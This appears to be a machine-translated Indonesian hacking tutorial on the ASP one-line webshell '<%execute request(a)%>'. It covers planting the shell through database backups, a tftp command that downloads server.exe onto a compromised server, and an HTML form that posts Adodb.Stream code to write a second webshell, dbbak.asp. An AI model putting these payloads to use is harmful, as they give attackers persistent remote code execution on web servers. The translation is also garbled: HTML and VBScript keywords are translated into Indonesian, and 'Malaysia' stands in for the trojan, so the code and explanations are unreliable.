Trojan satu kalimat dimasukkan ke dalam file ASP: Tentu saja, Trojan satu kalimat itu sendiri adalah file ASP. Dapat diakses menggunakan IE: Hanya jika bisa diakses, kami dapat mengirimkan datanya
Akses melalui protokol HTTP
Dalam satu kalimat, ruang lingkup penggunaan Trojan (saya hanya mencantumkan 2 jenis):
1) Hanya diperlukan cadangan basis data
Ketika database dicadangkan ke dalam file asp, tidak terjadi kesalahan kompilasi, dan tanda penutupan skrip tidak ada %>
2) Saat mengatur izin SA, biasanya Anda menulis kalimat terlebih dahulu untuk kenyamanan (Tentu saja lebih cepat mengunggah merpati langsung melalui tftp dan menjalankannya)
tftp -i ip dapatkan server.exe
Prinsip kuda Trojan <%execute request(a)%> dalam satu kalimat:
tahu dulu
Fungsi mengeksekusi() digunakan untuk mengeksekusi kode asp. Fungsi ini bertanggung jawab untuk mengeksekusi kuda yang kita unggah dan meneruskannya ke asp.dll untuk dianalisis. Kode di atas <%execute request(a)%> dapat dijelaskan seperti ini:
<%
jika permintaan(a)<> lalu jalankan permintaan(a)
%>
Jika a tidak kosong maka akan dieksekusi.
jika sebuah != 0
Mari kita lihat kliennya:
<bentuk aksi=http://192.168.0.28/shell.asp metode=post>
<nama area teks=l cols=120 baris=10 lebar=45>
set lP=server.CreateObject(Adodb.Stream) 'Buat komponen Adodb.Stream..
lP.Buka
lP.Jenis=2
lP.CharSet=gb2312
lP.permintaan teks tulis(p)
lP.SaveToFile server.mappath(dbbak.asp),2
lP.Tutup
atur lP=tidak ada
respon.redirect dbbak.asp
</area teks>
<textarea name=p cols=120 row=10 width=45>Data yang harus dikirimkan</textarea><BR><center><br>
<tipe masukan=kirim nilai=kirim>
Adodb.Stream bertanggung jawab untuk mengunggah data yang sudah dibaca ke server:
Komponen: Adodb.Stream
Ada metode berikut:
Batalkan metode
Bagaimana cara menggunakannya
Obyek.Batal
Deskripsi: Membatalkan eksekusi panggilan metode Eksekusi atau Buka asinkron yang tertunda.
Metode TulisTeks
Cara menggunakannya:
Objek.Tulis(Data,[Pilihan])
Deskripsi: Memuat data teks tertentu ke dalam objek.
Deskripsi parameter: Data adalah konten tertentu yang akan ditulis.
Opsi Opsi untuk menulis, yang tidak dapat ditentukan Parameter opsionalnya adalah sebagai berikut:
adWriteChar =0
baristulisiklan =1
metode SimpanToFile
Cara menggunakannya:
Objek.SaveToFile(NamaFile,[Opsi])
Deskripsi: Tulis konten objek ke file yang ditentukan oleh Nama File
Artinya, nama file tempat kita menyimpan Trojan adalah dbbak.asp
Deskripsi parameter: File ditentukan oleh Nama File
Opsi akses opsi, yang dapat dibiarkan tidak ditentukan. Parameter opsionalnya adalah sebagai berikut:
iklanSimpanBuatTidak Ada =1
iklanSimpanCreateOverWrite =2
Setelah mengirimkan kalimat Trojan, nilai a kosong dan menunggu nilai tertulis. Mengakses http://www.***.com/**.asp adalah proses menunggu. ) fungsi.. .
Buat Adodb.Stream, yang bertanggung jawab untuk menulis data kita ke server...
Pada saat yang sama, variabel SaveToFile yang ditentukan oleh komponen ini mendefinisikan nama Malaysia kami..dbbak.asp
Setelah dikirimkan ke server, fungsi eksekusi() mendeteksi bahwa nilai a tidak kosong, sehingga mengeksekusi Malaysia kita!